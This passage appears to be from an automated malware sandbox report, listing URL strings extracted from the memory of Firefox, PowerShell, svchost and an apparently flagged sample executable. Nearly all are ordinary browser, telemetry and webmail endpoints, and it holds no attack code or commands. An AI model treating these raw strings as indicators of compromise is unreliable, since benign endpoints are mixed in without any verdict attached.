                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922709000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTab
                      Source: firefox.exe, 00000034.00000002.2023597144.000001F9201E0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabPlease
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922709000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture
                      Source: firefox.exe, 00000034.00000002.2023597144.000001F9201E0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureOffscreenCanvas.toBlob()
                      Source: firefox.exe, 00000034.00000002.2023597144.000001F9201E0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureRequest
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922709000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCapture
                      Source: firefox.exe, 00000034.00000002.2023597144.000001F9201E0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureInstallTrigger.install()
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922709000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryption
                      Source: firefox.exe, 00000034.00000002.2023597144.000001F9201E0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryptiondocument.requestSto
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationsFea
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922709000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsing
                      Source: firefox.exe, 00000034.00000002.2023597144.000001F9201E0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingTrying
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
                      Source: firefox.exe, 00000034.00000002.1997756718.000001F91FC7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com
                      Source: firefox.exe, 00000034.00000002.2038405928.00002736B3E00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.1958008473.000001F922A57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/
                      Source: firefox.exe, 00000034.00000002.2038405928.00002736B3E00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/Z
                      Source: 19be97887a.exe, 00000023.00000003.1871649664.00000000057C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: 19be97887a.exe, 0000001E.00000003.1726455907.00000000058C9000.00000004.00000800.00020000.00000000.sdmp, 19be97887a.exe, 00000023.00000003.1871649664.00000000057C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                      Source: 19be97887a.exe, 00000023.00000003.1871649664.00000000057C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: firefox.exe, 00000034.00000002.1990196236.000001F91EA82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2032603820.000001F922603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921293000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
                      Source: firefox.exe, 00000034.00000002.2032603820.000001F922603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921293000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922709000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/
                      Source: firefox.exe, 00000034.00000002.2023597144.000001F9201E0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/initMouseEvent()
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
                      Source: firefox.exe, 00000034.00000002.2023047456.000001F9201B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922709000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1Populating
                      Source: firefox.exe, 00000034.00000002.1997756718.000001F91FC4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fpn.firefox.com
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
                      Source: svchost.exe, 00000015.00000003.1203494684.000002CF0F931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                      Source: svchost.exe, 00000015.00000003.1203494684.000002CF0F8C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
                      Source: 19be97887a.exe, 00000023.00000003.1871649664.00000000057C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/recommendations
                      Source: firefox.exe, 00000034.00000002.2021063771.000001F91FF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/
                      Source: powershell.exe, 0000000F.00000002.956232423.0000024D8022B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: firefox.exe, 00000034.00000003.1956668985.000001F922A1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.1957376931.000001F922A3A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.1958286370.000001F922A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.1956268965.000001F922800000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.1958008473.000001F922A57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mozilla-services/screenshots
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mozilla-services/screenshotsexperiment-apis/systemManufacturer.json/shims/google-
                      Source: powershell.exe, 0000000C.00000002.941241266.0000025642731000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.956232423.0000024D80C2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: firefox.exe, 00000034.00000002.1997756718.000001F91FC7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
                      Source: firefox.exe, 00000034.00000002.1980859392.000001F912D11000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881setupChr
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://ideas.mozilla.org/
                      Source: firefox.exe, 00000034.00000002.1985782385.000001F91E4AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://install.mozilla.org
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
                      Source: firefox.exe, 00000034.00000002.2032603820.000001F922603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2021063771.000001F91FF20000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1997756718.000001F91FC9E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921293000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%shttps://email.seznam.cz/newMessageScreen?mailto=%s
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%ssetSlowScriptDebugHandler/debugService.activationH
                      Source: firefox.exe, 00000034.00000002.1990196236.000001F91EA82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2032603820.000001F922603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921293000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.inbox.lv/compose?to=%s
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.inbox.lv/compose?to=%sv
                      Source: firefox.exe, 00000034.00000002.1990196236.000001F91EA82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2032603820.000001F922603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921293000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
                      Source: firefox.exe, 00000034.00000002.1980859392.000001F912DDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://mitmdetection.services.mozilla.com/
                      Source: firefox.exe, 00000034.00000002.1997756718.000001F91FC4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1991428513.000001F91ED89000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/about
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/breach-details/
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/user/dashboard
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/user/preferences
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mzl.la/3NS9KJd
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
                      Source: powershell.exe, 0000000C.00000002.970405411.0000025651CAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.970405411.0000025651B6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.941241266.00000256434CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1045529664.0000024D901AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1045529664.0000024D9006D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://oauth.accounts.firefox.com/v1
                      Source: firefox.exe, 00000034.00000002.2032603820.000001F922603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921293000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%sisDefault
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
                      Source: firefox.exe, 00000034.00000002.1990196236.000001F91EA82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2032603820.000001F922603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921293000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sresource://gre/modules/JSONFile.sys.mjshttp://compose.mail.ya
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://profile.accounts.firefox.com/v1
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://profiler.firefox.com
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F92125B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://profiler.firefox.com/
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://profiler.firefox.comDEVTOOLS_POLICY_DISABLED_PREFdevtools-commandkey-inspectordevtools-comma
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://profiler.firefox.comdnsResolveFullyQualifiedNamestryKeywordFixupForURIInfoPrevent
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://relay.firefox.com/api/v1/
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
                      Source: firefox.exe, 00000034.00000002.1997756718.000001F91FC4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1991428513.000001F91ED89000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com
                      Source: firefox.exe, 00000034.00000003.1958008473.000001F922A57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com/
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com//shims/google-safeframe.html
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com//shims/google-safeframe.html/shims/mochitest-shim-1.jsexperiments/sc
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://smartblock.firefox.etp/facebook.svg
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://smartblock.firefox.etp/play.svg
